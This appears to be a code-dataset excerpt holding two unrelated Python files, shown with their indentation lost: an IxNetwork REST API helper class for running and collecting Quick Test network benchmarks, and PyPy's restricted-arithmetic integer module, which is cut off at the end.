content
stringlengths 5
1.05M
|
|---|
import re, time
from IxNetRestApi import IxNetRestApiException
from IxNetRestApiFileMgmt import FileMgmt
class QuickTest(object):
def __init__(self, ixnObj=None, fileMgmtObj=None):
self.ixnObj = ixnObj
if fileMgmtObj:
self.fileMgmtObj = fileMgmtObj
else:
self.fileMgmtObj = FileMgmt(ixnObj)
def setMainObject(self, mainObject):
# For Python Robot Framework support
self.ixnObj = mainObject
self.fileMgmtObj.setMainObject(mainObject)
def getAllQuickTestHandles(self):
"""
Description
Get all the Quick Test object handles
Returns:
['/api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2',
'/api/v1/sessions/1/ixnetwork/quickTest/rfc2889broadcastRate/1',
'/api/v1/sessions/1/ixnetwork/quickTest/rfc2889broadcastRate/2']
"""
response = self.ixnObj.get(self.ixnObj.sessionUrl+'/quickTest')
quickTestHandles = []
for eachTestId in response.json()['testIds']:
quickTestHandles.append(eachTestId)
return quickTestHandles
def getAllQuickTestNames(self):
quickTestNameList = []
for eachQtHandle in self.getAllQuickTestHandles():
response = self.ixnObj.get(self.ixnObj.httpHeader+eachQtHandle)
quickTestNameList.append(response.json()['name'])
return quickTestNameList
def getQuickTestHandleByName(self, quickTestName):
"""
Description
Get the Quick Test object handle by the name.
Parameter
quickTestName: The name of the Quick Test.
"""
for quickTestHandle in self.getAllQuickTestHandles():
response = self.ixnObj.get(self.ixnObj.httpHeader+quickTestHandle)
currentQtName = response.json()['name']
if (bool(re.match(quickTestName, currentQtName, re.I))):
return quickTestHandle
def getQuickTestNameByHandle(self, quickTestHandle):
"""
quickTestHandle = /api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2
"""
response = self.ixnObj.get(self.ixnObj.httpHeader + quickTestHandle)
return response.json()['name']
def getQuickTestDuration(self, quickTestHandle):
"""
quickTestHandle = /api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2
"""
response = self.ixnObj.get(self.ixnObj.httpHeader + quickTestHandle + '/testConfig')
return response.json()['duration']
def getQuickTestTotalFrameSizesToTest(self, quickTestHandle):
"""
quickTestHandle = /api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2
"""
response = self.ixnObj.get(self.ixnObj.httpHeader + quickTestHandle + '/testConfig')
return response.json()['framesizeList']
def applyQuickTest(self, qtHandle):
"""
Description
Apply Quick Test configurations
Parameter
qtHandle: The Quick Test object handle
"""
response = self.ixnObj.post(self.ixnObj.sessionUrl+'/quickTest/operations/apply', data={'arg1': qtHandle})
if self.ixnObj.waitForComplete(response, self.ixnObj.sessionUrl+'/quickTest/operations/apply/'+response.json()['id']) == 1:
raise IxNetRestApiException('applyTraffic: waitForComplete failed')
def getQuickTestCurrentAction(self, quickTestHandle):
"""
quickTestHandle = /api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2
"""
ixNetworkVersion = self.ixnObj.getIxNetworkVersion()
match = re.match('([0-9]+)\.[^ ]+ *', ixNetworkVersion)
if int(match.group(1)) >= 8:
timer = 10
for counter in range(1,timer+1):
response = self.ixnObj.get(self.ixnObj.httpHeader+quickTestHandle+'/results', silentMode=True)
if counter < timer and response.json()['currentActions'] == []:
self.ixnObj.logInfo('getQuickTestCurrentAction is empty. Waiting %s/%s' % (counter, timer))
time.sleep(1)
continue
if counter < timer and response.json()['currentActions'] != []:
break
if counter == timer and response.json()['currentActions'] == []:
IxNetRestApiException('getQuickTestCurrentActions: Has no action')
return response.json()['currentActions'][-1]['arg2']
else:
response = self.ixnObj.get(self.ixnObj.httpHeader+quickTestHandle+'/results')
return response.json()['progress']
def verifyQuickTestInitialization(self, quickTestHandle):
"""
quickTestHandle = /api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2
"""
for timer in range(1,20+1):
currentAction = self.getQuickTestCurrentAction(quickTestHandle)
print('verifyQuickTestInitialization currentState: %s' % currentAction)
if timer < 20:
if currentAction == 'TestEnded' or currentAction == 'None':
self.ixnObj.logInfo('\nverifyQuickTestInitialization CurrentState = %s\n\tWaiting %s/20 seconds to change state' % (currentAction, timer))
time.sleep(1)
continue
else:
break
if timer >= 20:
if currentAction == 'TestEnded' or currentAction == 'None':
self.ixnObj.showErrorMessage()
raise IxNetRestApiException('Quick Test is stuck at TestEnded.')
ixNetworkVersionNumber = int(self.ixnObj.getIxNetworkVersion().split('.')[0])
applyQuickTestCounter = 60
for counter in range(1,applyQuickTestCounter+1):
quickTestApplyStates = ['InitializingTest', 'ApplyFlowGroups', 'SetupStatisticsCollection']
currentAction = self.getQuickTestCurrentAction(quickTestHandle)
if currentAction == None:
currentAction = 'ApplyingAndInitializing'
print('\nverifyQuickTestInitialization: %s Expecting: TransmittingFrames\n\tWaiting %s/%s seconds' % (currentAction, counter, applyQuickTestCounter))
if ixNetworkVersionNumber >= 8:
if counter < applyQuickTestCounter and currentAction != 'TransmittingFrames':
time.sleep(1)
continue
if counter < applyQuickTestCounter and currentAction == 'TransmittingFrames':
self.ixnObj.logInfo('\nVerifyQuickTestInitialization is done applying configuration and has started transmitting frames\n')
break
if ixNetworkVersionNumber < 8:
if counter < applyQuickTestCounter and currentAction == 'ApplyingAndInitializing':
time.sleep(1)
continue
if counter < applyQuickTestCounter and currentAction == 'ApplyingAndInitializing':
self.ixnObj.logInfo('\nVerifyQuickTestInitialization is done applying configuration and has started transmitting frames\n')
break
if counter == applyQuickTestCounter:
if ixNetworkVersionNumber >= 8 and currentAction != 'TransmittingFrames':
self.ixnObj.showErrorMessage()
if currentAction == 'ApplyFlowGroups':
self.ixnObj.logInfo('\nIxNetwork is stuck on Applying Flow Groups. You need to go to the session to FORCE QUIT it.\n')
raise IxNetRestApiException('\nVerifyQuickTestInitialization is stuck on %s. Waited %s/%s seconds' % (
currentAction, counter, applyQuickTestCounter))
if ixNetworkVersionNumber < 8 and currentAction != 'Trial':
self.ixnObj.showErrorMessage()
raise IxNetRestApiException('\nVerifyQuickTestInitialization is stuck on %s. Waited %s/%s seconds' % (
currentAction, counter, applyQuickTestCounter))
def startQuickTest(self, quickTestHandle):
"""
Description
Start a Quick Test
Parameter
quickTestHandle: The Quick Test object handle.
/api/v1/sessions/{id}/ixnetwork/quickTest/rfc2544throughput/2
Syntax
POST: http://{apiServerIp:port}/api/v1/sessions/{1}/ixnetwork/quickTest/operations/start
data={arg1: '/api/v1/sessions/{id}/ixnetwork/quickTest/rfc2544throughput/2'}
headers={'content-type': 'application/json'}
"""
url = self.ixnObj.sessionUrl+'/quickTest/operations/start'
self.ixnObj.logInfo('\nstartQuickTest:%s' % url)
response = self.ixnObj.post(url, data={'arg1': quickTestHandle})
if self.ixnObj.waitForComplete(response, url+'/'+response.json()['id']) == 1:
raise IxNetRestApiException
def stopQuickTest(self, quickTestHandle):
"""
Description
Stop the Quick Test.
Parameter
quickTestHandle: The Quick Test object handle.
/api/v1/sessions/{id}/ixnetwork/quickTest/rfc2544throughput/2
Syntax
POST: http://{apiServerIp:port}/api/v1/sessions/{1}/ixnetwork/quickTest/operations/stop
data={arg1: '/api/v1/sessions/{id}/ixnetwork/quickTest/rfc2544throughput/2'}
headers={'content-type': 'application/json'}
"""
url = self.ixnObj.sessionUrl+'/quickTest/operations/stop'
response = self.ixnObj.post(url, data={'arg1': quickTestHandle})
if self.ixnObj.waitForComplete(response, url+'/'+response.json()['id']) == 1:
raise IxNetRestApiException
def monitorQuickTestRunningProgress(self, quickTestHandle, getProgressInterval=10):
"""
Description
monitor the Quick Test running progress.
For Linux API server only, it must be a NGPF configuration. (Classic Framework is not supported in REST)
Parameters
quickTestHandle: /api/v1/sessions/{1}/ixnetwork/quickTest/rfc2544throughput/2
"""
isRunningBreakFlag = 0
trafficStartedFlag = 0
waitForRunningProgressCounter = 0
counter = 1
while True:
response = self.ixnObj.get(self.ixnObj.httpHeader+quickTestHandle+'/results', silentMode=True)
isRunning = response.json()['isRunning']
if isRunning == True:
response = self.ixnObj.get(self.ixnObj.httpHeader+quickTestHandle+'/results', silentMode=True)
currentRunningProgress = response.json()['progress']
if bool(re.match('^Trial.*', currentRunningProgress)) == False:
if waitForRunningProgressCounter < 30:
self.ixnObj.logInfo('isRunning=True. Waiting for trial runs {0}/30 seconds'.format(waitForRunningProgressCounter))
waitForRunningProgressCounter += 1
time.sleep(1)
if waitForRunningProgressCounter == 30:
raise IxNetRestApiException('isRunning=True. No quick test stats showing.')
else:
trafficStartedFlag = 1
self.ixnObj.logInfo(currentRunningProgress)
counter += 1
time.sleep(getProgressInterval)
continue
else:
if trafficStartedFlag == 1:
# We only care about traffic not running in the beginning.
# If traffic ran and stopped, then break out.
self.ixnObj.logInfo('\nisRunning=False. Quick Test is complete')
return 0
if isRunningBreakFlag < 20:
print('isRunning=False. Wait {0}/20 seconds'.format(isRunningBreakFlag))
isRunningBreakFlag += 1
time.sleep(1)
continue
if isRunningBreakFlag == 20:
raise IxNetRestApiException('Quick Test failed to start:', response.json()['status'])
def getQuickTestResultPath(self, quickTestHandle):
"""
quickTestHandle = /api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2
"""
response = self.ixnObj.get(self.ixnObj.httpHeader + quickTestHandle + '/results')
# "resultPath": "C:\\Users\\hgee\\AppData\\Local\\Ixia\\IxNetwork\\data\\result\\DP.Rfc2544Tput\\10694b39-6a8a-4e70-b1cd-52ec756910c3\\Run0001"
return response.json()['resultPath']
def getQuickTestResult(self, quickTestHandle, attribute):
"""
Description
Get Quick Test result attributes
Parameter
quickTestHandle: The Quick Test object handle
attribute options to get:
result - Returns pass
status - Returns none
progress - blank or Trial 1/1 Iteration 1, Size 64, Rate 10 % Wait for 2 seconds Wait 70.5169449%complete
startTime - Returns 04/21/17 14:35:42
currentActions
waitingStatus
resultPath
isRunning - Returns True or False
trafficStatus
duration - Returns 00:01:03
currentViews
"""
response = self.ixnObj.get(quickTestHandle+'/results')
return response.json()[attribute]
def getQuickTestCsvFiles(self, quickTestHandle, copyToPath, csvFile='all'):
"""
Description
Copy Quick Test CSV result files to a specified path on either Windows or Linux.
Note: Currently only supports copying from Windows.
Copy from Linux is coming in November.
quickTestHandle: The Quick Test handle.
copyToPath: The destination path to copy to.
If copy to Windows: c:\\Results\\Path
If copy to Linux: /home/user1/results/path
csvFile: A list of CSV files to get: 'all', one or more CSV files to get:
AggregateResults.csv, iteration.csv, results.csv, logFile.txt, portMap.csv
"""
resultsPath = self.getQuickTestResultPath(quickTestHandle)
self.ixnObj.logInfo('\ngetQuickTestCsvFiles: %s' % resultsPath)
if csvFile == 'all':
getCsvFiles = ['AggregateResults.csv', 'iteration.csv', 'results.csv', 'logFile.txt', 'portMap.csv']
else:
if type(csvFile) is not list:
getCsvFiles = [csvFile]
else:
getCsvFiles = csvFile
for eachCsvFile in getCsvFiles:
# Backslash indicates the results resides on a Windows OS.
if '\\' in resultsPath:
if bool(re.match('[a-z]:.*', copyToPath, re.I)):
self.fileMgmtObj.copyFileWindowsToLocalWindows(resultsPath+'\\{0}'.format(eachCsvFile), copyToPath)
else:
self.fileMgmtObj.copyFileWindowsToLocalLinux(resultsPath+'\\{0}'.format(eachCsvFile), copyToPath)
else:
# TODO: Copy from Linux to Windows and Linux to Linux.
pass
def getQuickTestPdf(self, quickTestHandle, copyToLocalPath, where='remoteLinux', renameDestinationFile=None, includeTimestamp=False):
"""
Description
Generate Quick Test result to PDF and retrieve the PDF result file.
Parameter
where: localWindows|remoteWindows|remoteLinux. The destination.
copyToLocalPath: The local destination path to store the PDF result file.
renameDestinationFile: Rename the PDF file.
includeTimestamp: True|False. Set to True if you don't want to overwrite previous result file.
"""
response = self.ixnObj.post(self.ixnObj.httpHeader+quickTestHandle+'/operations/generateReport', data={'arg1': quickTestHandle})
if response.json()['url'] != '':
if self.ixnObj.waitForComplete(response, self.ixnObj.httpHeader+response.json()['url']) == 1:
raise IxNetRestApiException
if where == 'localWindows':
response = self.ixnObj.get(self.ixnObj.httpHeader+response.json()['url'])
self.fileMgmtObj.copyFileWindowsToLocalWindows(response.json()['result'], copyToLocalPath, renameDestinationFile, includeTimestamp)
if where == 'remoteWindows':
# TODO: Work in progress. Not sure if this is possible.
resultPath = self.getQuickTestResultPath(quickTestHandle)
#self.ixnObj.copyFileWindowsToRemoteWindows(response.json()['result'], copyToLocalPath, renameDestinationFile, includeTimestamp)
self.fileMgmtObj.copyFileWindowsToRemoteWindows(resultPath, copyToLocalPath, renameDestinationFile, includeTimestamp)
if where == 'remoteLinux':
linuxResultPath = self.getQuickTestResultPath(quickTestHandle)
self.fileMgmtObj.copyFileWindowsToLocalLinux(linuxResultPath+'\\TestReport.pdf', copyToLocalPath, renameDestinationFile, includeTimestamp)
else:
self.ixnObj.logInfo('\ngetQuickTestPdf failed. Result path = %s' % response.json()['result'])
def runQuickTest(self, quickTestName, timeout=90):
"""
Description
Run the Quick test
Parameter
quickTestName: <str>: name of the quick test to run
timeout: <int>: duration for quick test to run. Default=90 seconds
Example
runQuickTest("Macro_17_57_14_294", timeout=180)
Return
Note: operation run will keep checking the status of execution for the specified timeout
"""
eventSchedulerHandle = self.getQuickTestHandleByName(quickTestName)
url = self.ixnObj.sessionUrl + '/quickTest/eventScheduler/operations/run'
data = {"arg1": eventSchedulerHandle}
response = self.ixnObj.post(url, data=data)
self.ixnObj.waitForComplete(response, url + '/' + response.json()['id'], timeout=timeout)
def deleteQuickTest(self, quickTestName):
"""
Description
Delete the Quick test.
Parameter
quickTestName: <str>: name of the quick test to delete
Example
deleteQuickTest("Macro_17_57_14_294")
Return
"""
eventSchedulerHandle = self.getQuickTestHandleByName(quickTestName)
#delete the quick test
url = self.ixnObj.httpHeader + eventSchedulerHandle
self.ixnObj.delete(url)
def configQuickTest(self, quickTestName, numOfTrials=1):
"""
Description
Configure a quick test
Parameter
quickTestName: <str>: name of the quick test to configure
numOfTrials: <int>: number of iterations to run the quick test, default is 1
Example
configQuickTest("Macro_17_57_14_294")
configQuickTest("Macro_17_57_14_294", numOfTrials=2)
Return
event scheduler handle on success or exception on failure
"""
url = self.ixnObj.sessionUrl + '/quickTest/eventScheduler'
response = self.ixnObj.post(url, data={"forceApplyQTConfig": "true", "mode": "existingMode", "name": quickTestName})
eventSchedulerHandle = response.json()["links"][0]["href"]
url = self.ixnObj.httpHeader + eventSchedulerHandle + '/eventScheduler'
self.ixnObj.post(url, data={"enabled": "true", "itemId": quickTestName, "itemName": quickTestName})
url = self.ixnObj.httpHeader + eventSchedulerHandle + '/testConfig'
self.ixnObj.patch(url, data={"numTrials": numOfTrials})
return eventSchedulerHandle
|
"""
This file defines restricted arithmetic:
classes and operations to express integer arithmetic,
such that before and after translation semantics are
consistent
r_uint an unsigned integer which has no overflow
checking. It is always positive and always
truncated to the internal machine word size.
intmask mask a possibly long value when running on CPython
back to a signed int value
ovfcheck check on CPython whether the result of a signed
integer operation did overflow
ovfcheck_float_to_int
convert to an integer or raise OverflowError
r_longlong
like r_int but double word size
r_ulonglong
like r_uint but double word size
widen(x)
if x is of a type smaller than lltype.Signed or
lltype.Unsigned, widen it to lltype.Signed.
Useful because the translator doesn't support
arithmetic on the smaller types.
These are meant to be erased by translation, r_uint
in the process should mark unsigned values, ovfcheck should
mark where overflow checking is required.
"""
import sys, struct
from rpython.rtyper import extregistry
from rpython.rlib import objectmodel
from rpython.flowspace.model import Constant, const
from rpython.flowspace.specialcase import register_flow_sc
"""
Long-term target:
We want to make pypy very flexible concerning its data type layout.
This is a larger task for later.
Short-term target:
We want to run PyPy on windows 64 bit.
Problem:
On windows 64 bit, integers are only 32 bit. This is a problem for PyPy
right now, since it assumes that a c long can hold a pointer.
We therefore set up the target machine constants to obey this rule.
Right now this affects 64 bit Python only on windows.
Note: We use the struct module, because the array module doesn's support
all typecodes.
"""
def _get_bitsize(typecode):
return len(struct.pack(typecode, 1)) * 8
_long_typecode = 'l'
if _get_bitsize('P') > _get_bitsize('l'):
_long_typecode = 'P'
def _get_long_bit():
# whatever size a long has, make it big enough for a pointer.
return _get_bitsize(_long_typecode)
# exported for now for testing array values.
# might go into its own module.
def get_long_pattern(x):
"""get the bit pattern for a long, adjusted to pointer size"""
return struct.pack(_long_typecode, x)
# used in tests for ctypes and for genc and friends
# to handle the win64 special case:
is_emulated_long = _long_typecode != 'l'
LONG_BIT = _get_long_bit()
LONG_MASK = (2**LONG_BIT)-1
LONG_TEST = 2**(LONG_BIT-1)
# XXX this is a good guess, but what if a long long is 128 bit?
LONGLONG_BIT = 64
LONGLONG_MASK = (2**LONGLONG_BIT)-1
LONGLONG_TEST = 2**(LONGLONG_BIT-1)
LONG_BIT_SHIFT = 0
while (1 << LONG_BIT_SHIFT) != LONG_BIT:
LONG_BIT_SHIFT += 1
assert LONG_BIT_SHIFT < 99, "LONG_BIT_SHIFT value not found?"
LONGLONGLONG_BIT = 128
LONGLONGLONG_MASK = (2**LONGLONGLONG_BIT)-1
LONGLONGLONG_TEST = 2**(LONGLONGLONG_BIT-1)
"""
int is no longer necessarily the same size as the target int.
We therefore can no longer use the int type as it is, but need
to use long everywhere.
"""
# XXX returning int(n) should not be necessary and should be simply n.
# XXX TODO: replace all int(n) by long(n) and fix everything that breaks.
# XXX Then relax it and replace int(n) by n.
def intmask(n):
"""
NOT_RPYTHON
"""
if isinstance(n, objectmodel.Symbolic):
return n # assume Symbolics don't overflow
assert not isinstance(n, float)
if is_valid_int(n):
return int(n)
n = long(n)
n &= LONG_MASK
if n >= LONG_TEST:
n -= 2*LONG_TEST
return int(n)
def longlongmask(n):
"""
NOT_RPYTHON
"""
assert isinstance(n, (int, long))
n = long(n)
n &= LONGLONG_MASK
if n >= LONGLONG_TEST:
n -= 2*LONGLONG_TEST
return r_longlong(n)
def longlonglongmask(n):
# Assume longlonglong doesn't overflow. This is perfectly fine for rbigint.
# We deal directly with overflow there anyway.
return r_longlonglong(n)
def widen(n):
from rpython.rtyper.lltypesystem import lltype
if _should_widen_type(lltype.typeOf(n)):
return intmask(n)
else:
return n
widen._annspecialcase_ = 'specialize:argtype(0)'
def _should_widen_type(tp):
from rpython.rtyper.lltypesystem import lltype, rffi
if tp is lltype.Bool:
return True
if tp is lltype.Signed:
return False
r_class = rffi.platform.numbertype_to_rclass[tp]
assert issubclass(r_class, base_int)
return r_class.BITS < LONG_BIT or (
r_class.BITS == LONG_BIT and r_class.SIGNED)
_should_widen_type._annspecialcase_ = 'specialize:memo'
# the replacement for sys.maxint
maxint = int(LONG_TEST - 1)
# for now, it should be equal to sys.maxint on all supported platforms
assert maxint == sys.maxint
def is_valid_int(r):
if objectmodel.we_are_translated():
return isinstance(r, int)
return isinstance(r, (base_int, int, long, bool)) and (
-maxint - 1 <= r <= maxint)
is_valid_int._annspecialcase_ = 'specialize:argtype(0)'
def ovfcheck(r):
"NOT_RPYTHON"
# to be used as ovfcheck(x <op> y)
# raise OverflowError if the operation did overflow
assert not isinstance(r, r_uint), "unexpected ovf check on unsigned"
assert not isinstance(r, r_longlong), "ovfcheck not supported on r_longlong"
assert not isinstance(r, r_ulonglong), "ovfcheck not supported on r_ulonglong"
if type(r) is long and not is_valid_int(r):
# checks only if applicable to r's type.
# this happens in the garbage collector.
raise OverflowError("signed integer expression did overflow")
return r
# Strange things happening for float to int on 64 bit:
# int(float(i)) != i because of rounding issues.
# These are the minimum and maximum float value that can
# successfully be casted to an int.
if sys.maxint == 2147483647:
def ovfcheck_float_to_int(x):
from rpython.rlib.rfloat import isnan
if isnan(x):
raise OverflowError
if -2147483649.0 < x < 2147483648.0:
return int(x)
raise OverflowError
else:
# The following values are not quite +/-sys.maxint.
# Note the "<= x <" here, as opposed to "< x <" above.
# This is justified by test_typed in translator/c/test.
def ovfcheck_float_to_int(x):
from rpython.rlib.rfloat import isnan
if isnan(x):
raise OverflowError
if -9223372036854776832.0 <= x < 9223372036854775296.0:
return int(x)
raise OverflowError
def compute_restype(self_type, other_type):
if self_type is other_type:
if self_type is bool:
return int
return self_type
if other_type in (bool, int, long):
if self_type is bool:
return int
return self_type
if self_type in (bool, int, long):
return other_type
if self_type is float or other_type is float:
return float
if self_type.SIGNED == other_type.SIGNED:
return build_int(None, self_type.SIGNED, max(self_type.BITS, other_type.BITS))
raise AssertionError("Merging these types (%s, %s) is not supported" % (self_type, other_type))
def signedtype(t):
if t in (bool, int, long):
return True
else:
return t.SIGNED
signedtype._annspecialcase_ = 'specialize:memo'
def normalizedinttype(t):
if t is int:
return int
if t.BITS <= r_int.BITS:
return build_int(None, t.SIGNED, r_int.BITS)
else:
assert t.BITS <= r_longlong.BITS
return build_int(None, t.SIGNED, r_longlong.BITS)
def most_neg_value_of_same_type(x):
from rpython.rtyper.lltypesystem import lltype
return most_neg_value_of(lltype.typeOf(x))
most_neg_value_of_same_type._annspecialcase_ = 'specialize:argtype(0)'
def most_neg_value_of(tp):
from rpython.rtyper.lltypesystem import lltype, rffi
if tp is lltype.Signed:
return -sys.maxint-1
r_class = rffi.platform.numbertype_to_rclass[tp]
assert issubclass(r_class, base_int)
if r_class.SIGNED:
return r_class(-(r_class.MASK >> 1) - 1)
else:
return r_class(0)
most_neg_value_of._annspecialcase_ = 'specialize:memo'
def most_pos_value_of_same_type(x):
from rpython.rtyper.lltypesystem import lltype
return most_pos_value_of(lltype.typeOf(x))
most_pos_value_of_same_type._annspecialcase_ = 'specialize:argtype(0)'
def most_pos_value_of(tp):
from rpython.rtyper.lltypesystem import lltype, rffi
if tp is lltype.Signed:
return sys.maxint
r_class = rffi.platform.numbertype_to_rclass[tp]
assert issubclass(r_class, base_int)
if r_class.SIGNED:
return r_class(r_class.MASK >> 1)
else:
return r_class(r_class.MASK)
most_pos_value_of._annspecialcase_ = 'specialize:memo'
def is_signed_integer_type(tp):
from rpython.rtyper.lltypesystem import lltype, rffi
if tp is lltype.Signed:
return True
try:
r_class = rffi.platform.numbertype_to_rclass[tp]
return r_class.SIGNED
except KeyError:
return False # not an integer type
is_signed_integer_type._annspecialcase_ = 'specialize:memo'
def highest_bit(n):
"""
Calculates the highest set bit in n. This function assumes that n is a
power of 2 (and thus only has a single set bit).
"""
assert n and (n & (n - 1)) == 0
i = -1
while n:
i += 1
n >>= 1
return i
class base_int(long):
""" fake unsigned integer implementation """
def _widen(self, other, value):
"""
if one argument is int or long, the other type wins.
if one argument is float, the result is float.
otherwise, produce the largest class to hold the result.
"""
self_type = type(self)
other_type = type(other)
try:
return self.typemap[self_type, other_type](value)
except KeyError:
pass
restype = compute_restype(self_type, other_type)
self.typemap[self_type, other_type] = restype
return restype(value)
def __new__(klass, val):
if klass is base_int:
raise TypeError("abstract base!")
else:
return super(base_int, klass).__new__(klass, val)
def __add__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x + y)
__radd__ = __add__
def __sub__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x - y)
def __rsub__(self, other):
y = long(self)
x = long(other)
return self._widen(other, x - y)
def __mul__(self, other):
x = long(self)
if not isinstance(other, (int, long)):
return x * other
y = long(other)
return self._widen(other, x * y)
__rmul__ = __mul__
def __div__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x // y)
__floordiv__ = __div__
def __rdiv__(self, other):
y = long(self)
x = long(other)
return self._widen(other, x // y)
__rfloordiv__ = __rdiv__
def __mod__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x % y)
def __rmod__(self, other):
y = long(self)
x = long(other)
return self._widen(other, x % y)
def __divmod__(self, other):
x = long(self)
y = long(other)
res = divmod(x, y)
return (self.__class__(res[0]), self.__class__(res[1]))
def __lshift__(self, n):
x = long(self)
y = long(n)
return self.__class__(x << y)
def __rlshift__(self, n):
y = long(self)
x = long(n)
return self._widen(n, x << y)
def __rshift__(self, n):
x = long(self)
y = long(n)
return self._widen(n, x >> y)
def __rrshift__(self, n):
y = long(self)
x = long(n)
return self._widen(n, x >> y)
def __or__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x | y)
__ror__ = __or__
def __and__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x & y)
__rand__ = __and__
def __xor__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x ^ y)
__rxor__ = __xor__
def __neg__(self):
x = long(self)
return self.__class__(-x)
def __abs__(self):
x = long(self)
return self.__class__(abs(x))
def __pos__(self):
return self.__class__(self)
def __invert__(self):
x = long(self)
return self.__class__(~x)
def __pow__(self, other, m=None):
x = long(self)
y = long(other)
res = pow(x, y, m)
return self._widen(other, res)
def __rpow__(self, other, m=None):
y = long(self)
x = long(other)
res = pow(x, y, m)
return self._widen(other, res)
class signed_int(base_int):
SIGNED = True
def __new__(klass, val=0):
if isinstance(val, (float, str)):
val = long(val)
if val > klass.MASK >> 1 or val < -(klass.MASK >> 1) - 1:
raise OverflowError("%s does not fit in signed %d-bit integer" % (val, klass.BITS))
if val < 0:
val = ~ ((~val) & klass.MASK)
return super(signed_int, klass).__new__(klass, val)
typemap = {}
class unsigned_int(base_int):
SIGNED = False
def __new__(klass, val=0):
if isinstance(val, (float, long, str)):
val = long(val)
return super(unsigned_int, klass).__new__(klass, val & klass.MASK)
typemap = {}
_inttypes = {}
def build_int(name, sign, bits, force_creation=False):
sign = bool(sign)
if not force_creation:
try:
return _inttypes[sign, bits]
except KeyError:
pass
if sign:
base_int_type = signed_int
else:
base_int_type = unsigned_int
mask = (2 ** bits) - 1
if name is None:
raise TypeError('No predefined %sint%d'%(['u', ''][sign], bits))
int_type = type(name, (base_int_type,), {'MASK': mask,
'BITS': bits,
'SIGN': sign})
if not force_creation:
_inttypes[sign, bits] = int_type
class ForValuesEntry(extregistry.ExtRegistryEntry):
_type_ = int_type
def compute_annotation(self):
from rpython.annotator import model as annmodel
return annmodel.SomeInteger(knowntype=int_type)
class ForTypeEntry(extregistry.ExtRegistryEntry):
_about_ = int_type
def compute_result_annotation(self, *args_s, **kwds_s):
from rpython.annotator import model as annmodel
return annmodel.SomeInteger(knowntype=int_type)
def specialize_call(self, hop):
v_result, = hop.inputargs(hop.r_result.lowleveltype)
hop.exception_cannot_occur()
return v_result
return int_type
class BaseIntValueEntry(extregistry.ExtRegistryEntry):
_type_ = base_int
def compute_annotation(self):
from rpython.annotator import model as annmodel
return annmodel.SomeInteger(knowntype=r_ulonglong)
class BaseIntTypeEntry(extregistry.ExtRegistryEntry):
_about_ = base_int
def compute_result_annotation(self, *args_s, **kwds_s):
raise TypeError("abstract base!")
r_int = build_int('r_int', True, LONG_BIT)
r_uint = build_int('r_uint', False, LONG_BIT)
@register_flow_sc(r_uint)
def sc_r_uint(ctx, w_value):
# (normally, the 32-bit constant is a long, and is not allowed to
# show up in the flow graphs at all)
if isinstance(w_value, Constant):
return Constant(r_uint(w_value.value))
return ctx.appcall(r_uint, w_value)
r_longlong = build_int('r_longlong', True, 64)
r_ulonglong = build_int('r_ulonglong', False, 64)
r_longlonglong = build_int('r_longlonglong', True, 128)
longlongmax = r_longlong(LONGLONG_TEST - 1)
if r_longlong is not r_int:
r_int64 = r_longlong
r_uint64 = r_ulonglong
r_int32 = int # XXX: what about r_int
r_uint32 = r_uint
else:
r_int64 = int # XXX: what about r_int
r_uint64 = r_uint # is r_ulonglong
r_int32 = build_int('r_int32', True, 32) # also needed for rposix_stat.time_t_to_FILE_TIME in the 64 bit case
r_uint32 = build_int('r_uint32', False, 32)
SHRT_MIN = -2**(_get_bitsize('h') - 1)
SHRT_MAX = 2**(_get_bitsize('h') - 1) - 1
USHRT_MAX = 2**_get_bitsize('h') - 1
INT_MIN = int(-2**(_get_bitsize('i') - 1))
INT_MAX = int(2**(_get_bitsize('i') - 1) - 1)
UINT_MAX = r_uint(2**_get_bitsize('i') - 1)
# the 'float' C type
class r_singlefloat(object):
"""A value of the C type 'float'.
This is a single-precision floating-point number.
Regular 'float' values in Python and RPython are double-precision.
Note that we consider this as a black box for now - the only thing
you can do with it is cast it back to a regular float."""
def __init__(self, floatval):
import struct
# simulates the loss of precision
self._bytes = struct.pack("f", floatval)
def __float__(self):
import struct
return struct.unpack("f", self._bytes)[0]
def __nonzero__(self):
raise TypeError("not supported on r_singlefloat instances")
def __cmp__(self, other):
raise TypeError("not supported on r_singlefloat instances")
def __eq__(self, other):
return self.__class__ is other.__class__ and self._bytes == other._bytes
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return 'r_singlefloat(%s)' % (float(self),)
class r_longfloat(object):
"""A value of the C type 'long double'.
Note that we consider this as a black box for now - the only thing
you can do with it is cast it back to a regular float."""
def __init__(self, floatval):
self.value = floatval
def __float__(self):
return self.value
def __nonzero__(self):
raise TypeError("not supported on r_longfloat instances")
def __cmp__(self, other):
raise TypeError("not supported on r_longfloat instances")
def __eq__(self, other):
return self.__class__ is other.__class__ and self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
class For_r_singlefloat_values_Entry(extregistry.ExtRegistryEntry):
_type_ = r_singlefloat
def compute_annotation(self):
from rpython.annotator import model as annmodel
return annmodel.SomeSingleFloat()
class For_r_singlefloat_type_Entry(extregistry.ExtRegistryEntry):
_about_ = r_singlefloat
def compute_result_annotation(self, *args_s, **kwds_s):
from rpython.annotator import model as annmodel
return annmodel.SomeSingleFloat()
def specialize_call(self, hop):
from rpython.rtyper.lltypesystem import lltype
v, = hop.inputargs(lltype.Float)
hop.exception_cannot_occur()
# we use cast_primitive to go between Float and SingleFloat.
return hop.genop('cast_primitive', [v],
resulttype = lltype.SingleFloat)
def int_between(n, m, p):
""" check that n <= m < p. This assumes that n <= p. This is useful because
the JIT special-cases it. """
from rpython.rtyper.lltypesystem import lltype
from rpython.rtyper.lltypesystem.lloperation import llop
if not objectmodel.we_are_translated():
assert n <= p
return llop.int_between(lltype.Bool, n, m, p)
def int_force_ge_zero(n):
""" The JIT special-cases this too. """
from rpython.rtyper.lltypesystem import lltype
